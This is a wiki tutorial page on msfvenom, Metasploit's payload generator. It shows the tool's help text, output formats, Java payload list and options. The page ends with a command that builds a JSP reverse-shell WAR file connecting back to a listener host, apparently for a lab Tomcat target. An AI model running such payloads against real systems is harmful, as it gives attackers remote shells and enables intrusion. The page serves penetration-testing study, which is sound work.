MSFVenom
From charlesreid1
Can be used to craft payloads like remote tcp shells.
See this tool in action: Metasploitable/Apache/DAV
More info: https://sathisharthars.wordpress.com/tag/msfvenom/
And: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
Creating Payloads
Here's the help message for msfvenom:
root@morpheus:~# msfvenom -h
Error: MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Options:
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder <encoder> The encoder to use
-a, --arch <arch> The architecture to use
--platform <platform> The platform of the payload
--help-platforms List available platforms
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
Also, a list of different formats that msfvenom is capable of deploying:
root@morpheus:~# msfvenom --help-formats Error: Executable formats asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war Transform formats bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
Let's walk through the usage, so you can see how to fumble your way through using this tool.
Tomcat
To create a WAR file that woudl give a reverse shell, I used msfvenom to generate the payload.
I started by listing all the different payloads available, and looked for java-related payloads:
root@morpheus:~/box/besside# msfvenom -l payloads
Framework Payloads (437 total)
==============================
Name Description
---- -----------
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
java/shell_reverse_tcp Connect back to attacker and spawn a command shell
Probably want to use java/jsp_shell_reverse_tcp or java/meterpreter/reverse_tcp.
jsp shell reverse tcp
Here are the options:
root@morpheus:~/box/besside# msfvenom -p java/jsp_shell_reverse_tcp --payload-options
Options for payload/java/jsp_shell_reverse_tcp:
Name: Java JSP Command Shell, Reverse TCP Inline
Module: payload/java/jsp_shell_reverse_tcp
Platform: Linux, OSX, Solaris, Unix, Windows
Arch: java
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
SHELL no The system shell to use.
Description:
Connect back to attacker and spawn a command shell
Advanced options for payload/java/jsp_shell_reverse_tcp:
Name : AutoRunScript
Current Setting:
Description : A script to run automatically on session creation.
Name : InitialAutoRunScript
Current Setting:
Description : An initial script to run on session creation (before
AutoRunScript)
Name : ReverseAllowProxy
Current Setting: false
Description : Allow reverse tcp even with Proxies specified. Connect back
will NOT go through proxy but directly to LHOST
Name : ReverseConnectRetries
Current Setting: 5
Description : The number of connection attempts to try before exiting the
process
Name : ReverseListenerBindAddress
Current Setting:
Description : The specific IP address to bind to on the local system
Name : ReverseListenerBindPort
Current Setting:
Description : The port to bind to on the local system if different from LPORT
Name : ReverseListenerComm
Current Setting:
Description : The specific communication channel to use for this listener
Name : ReverseListenerThreaded
Current Setting: false
Description : Handle every connection in a new thread (experimental)
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
Evasion options for payload/java/jsp_shell_reverse_tcp:
Ok, let's give it a whirl.
root@morpheus:~/box/besside# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.25 LPORT=4444 -f war > runme.war Payload size: 1088 bytes